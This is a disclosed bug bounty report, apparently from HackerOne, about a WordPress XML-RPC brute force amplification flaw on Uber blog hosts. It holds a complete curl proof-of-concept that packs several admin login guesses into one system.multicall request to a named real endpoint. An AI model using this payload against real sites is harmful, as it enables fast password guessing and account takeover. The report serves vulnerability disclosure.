Brute Force Amplification Attack

Disclosed: 2016-08-12 17:23:50 By enmach To uber
Unknown
Vulnerability Details
The websites on following hosts - newsroom.uber.com - eng.uber.com - brand.uber.com are vulnerable to Wordpress Brute Force Amplification Attack where an attacker can try a large number of Wordpress usernames and password login combinations in single HTTP request (more at https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/). The attack can be used with large wordlists, because it makes brute forcing login very fast. Steps to reproduce: 1) execute following curl command: curl -i -s -k -X 'POST' \ -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' \ --data-binary $'<?xml version=\"1.0\"?>\x0d\x0a<methodCall>\x0d\x0a<methodName>system.multicall</methodName>\x0d\x0a<params>\x0d\x0a <param><value><array><data>\x0d\x0a <value><struct>\x0d\x0a <member>\x0d\x0a <name>methodName</name>\x0d\x0a <value><string>wp.getUsersBlogs</string></value>\x0d\x0a </member>\x0d\x0a <member>\x0d\x0a <name>params</name><value><array><data>\x0d\x0a <value><array><data>\x0d\x0a <value><string>admin</string></value>\x0d\x0a <value><string>1223</string></value>\x0d\x0a </data></array></value>\x0d\x0a </data></array></value>\x0d\x0a </member>\x0d\x0a </struct></value>\x0d\x0a <value><struct>\x0d\x0a <member>\x0d\x0a <name>methodName</name>\x0d\x0a <value><string>wp.getUsersBlogs</string></value>\x0d\x0a </member>\x0d\x0a <member>\x0d\x0a <name>params</name>\x0d\x0a <value><array><data>\x0d\x0a <value><array><data>\x0d\x0a <value><string>admin</string></value>\x0d\x0a <value><string>test</string></value>\x0d\x0a </data></array></value>\x0d\x0a </data></array></value>\x0d\x0a </member>\x0d\x0a </struct></value>\x0d\x0a <value><struct>\x0d\x0a <member>\x0d\x0a <name>methodName</name>\x0d\x0a <value><string>wp.getUsersBlogs</string></value>\x0d\x0a </member>\x0d\x0a <member>\x0d\x0a <name>params</name>\x0d\x0a <value><array><data>\x0d\x0a <value><array><data>\x0d\x0a <value><string>admin</string></value>\x0d\x0a <value><string>uber</string></value>\x0d\x0a </data></array></value>\x0d\x0a </data></array></value>\x0d\x0a </member>\x0d\x0a </struct></value>\x0d\x0a </data></array></value>\x0d\x0a </param>\x0d\x0a</params>\x0d\x0a</methodCall>' \ 'https://newsroom.uber.com/xmlrpc.php' 2) In the above request 3 usernames and passwords combinations are submitted to https://newsroom.uber.com/xmlrpc.php. 3) From the response it is evident that all 3 combinations have been checked on the server. Attached to this report are screenshots of this issue in Burp proxy. A request and a response to newsroom.uber.com is visible. In the response it is evident that 2 combinations of username and password have been checked on newsroom.uber.com.
Actions
View on HackerOne
Report Stats
  • Report ID: 125624
  • State: Closed
  • Substate: informative
  • Upvotes: 1
Share this report